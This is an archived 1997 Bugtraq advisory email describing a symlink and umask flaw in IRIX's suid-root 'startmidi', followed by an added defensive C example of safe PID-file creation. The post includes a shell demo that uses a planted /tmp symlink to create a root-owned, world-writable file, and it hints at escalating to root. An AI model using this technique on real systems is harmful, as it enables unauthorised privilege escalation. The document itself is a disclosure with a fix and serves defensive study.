From owner-bugtraq@NETSPACE.ORG Sun Feb 9 13:32:47 1997
Return-Path: owner-bugtraq@NETSPACE.ORG
Received: from brimstone (brimstone.netspace.org [128.148.157.143]) by koala.scott.net (8.7.5/8.7.3) with ESMTP id NAA14295; Sun, 9 Feb 1997 13:32:46 -0600
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <36179-21227>; Sun, 9 Feb 1997 14:28:20 -0500
Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with ESMTP id OAA15770; Sun, 9 Feb 1997 14:24:07 -0500
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 2690279 for BUGTRAQ@NETSPACE.ORG; Sun, 9 Feb 1997 13:42:14 -0500
Received: from netspace.org (unknown@netspace [128.148.157.6]) by netspace.org (8.8.2/8.8.2) with ESMTP id NAA12240 for ; Sun, 9 Feb 1997 13:41:07 -0500
Approved-By: aleph1@UNDERGROUND.ORG
Received: from dira.bris.ac.uk (dira.bris.ac.uk [137.222.10.41]) by netspace.org (8.8.2/8.8.2) with ESMTP id NAA09337 for ; Sun, 9 Feb 1997 13:08:45 -0500
Received: from kukini.cs.bris.ac.uk by dira.bris.ac.uk with SMTP (PP); Sun, 9 Feb 1997 18:11:38 +0000
Received: from maxx by kukini.compsci.bristol.ac.uk id aa24462; 9 Feb 97 18:11 GMT
Received: from localhost by maxx.cs.bris.ac.uk (SMI-8.6/SMI-SVR4) id SAA16208; Sun, 9 Feb 1997 18:11:45 GMT
X-Address: Computer Science Dept., University of Bristol, Bristol, U.K.
X-Work-Phone: +44 (117) 954 5106
X-Attribution: Dave
Message-ID: <16207.855511905@maxx>
Date: Sun, 9 Feb 1997 18:11:45 +0000
Reply-To: David Hedley
Sender: Bugtraq List
From: David Hedley
Subject: IRIX: Bug in startmidi
To: BUGTRAQ@NETSPACE.ORG
Status: RO
X-Status:

Whilst browsing around the filesystem on my SGI (running IRIX 5.3), I noticed a little suid-root program called 'startmidi' which hides in /usr/sbin. When run, this program creates various files in /tmp. You guessed it, it respects umask and follows symlinks.

Like this:

    % umask 0
    % ln -s /blardyblar /tmp/.midipid
    % startmidi -d /dev/ttyd1
    % ls -l /blardyblar
    -rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
    % stopmidi -d /dev/ttyd1
    %

Any existing files are truncated to zero length. New files are created root-owned, mode 0666. I leave it to your furtive imaginations to get root from this.

'stopmidi' removes the files created by 'startmidi' so you may have to run that first if /tmp/.midipid already exists.

chmod -s /usr/sbin/startmidi fixes this problem.

My apologies if this has been documented before but I couldn't find it anywhere on file and I don't remember it being posted to this list.

Regards,

David

--
David Hedley (hedley@cs.bris.ac.uk)
finger hedley@cs.bris.ac.uk for PGP key
Computer Graphics Group | University of Bristol | UK
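
Added example, not part of the original post and not SGI's code: a C sketch of file creation that avoids the two behaviours reported above, following a planted symlink and letting the caller's umask pick the mode. The names write_pidfile and symlink_is_refused and the demo paths are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW, mkdtemp, symlink */
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create a PID file without following a planted
 * symlink and without letting the caller's umask choose the mode.
 * Returns 0 on success, -1 with errno set. */
int write_pidfile(const char *path, pid_t pid)
{
    char buf[32];
    int len, saved;
    /* O_CREAT|O_EXCL fails if the name exists in any form, symlink included. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    len = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    /* fchmod sets the final mode explicitly, whatever the umask was. */
    if (fchmod(fd, 0644) == 0 && write(fd, buf, (size_t)len) == len)
        return close(fd);
    saved = errno;
    close(fd);
    unlink(path);                 /* removes only the file created above */
    errno = saved;
    return -1;
}

/* Constructed self-check: plant a symlink where the PID file should go,
 * as in the post, inside a private scratch directory.
 * Returns 1 if creation was refused and the link target never appeared. */
int symlink_is_refused(void)
{
    char dir[] = "/tmp/pidfile-demo-XXXXXX";
    char link[64], target[64];
    struct stat st;
    int refused, untouched;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(link, sizeof link, "%s/.midipid", dir);
    snprintf(target, sizeof target, "%s/victim", dir);
    if (symlink(target, link) != 0)
        return 0;
    refused = (write_pidfile(link, getpid()) == -1);
    untouched = (stat(target, &st) == -1 && errno == ENOENT);
    unlink(link);
    rmdir(dir);
    return refused && untouched;
}
```

A privileged program is better off keeping such state in a directory only root can write to; the flags above are the fallback when a world-writable directory cannot be avoided.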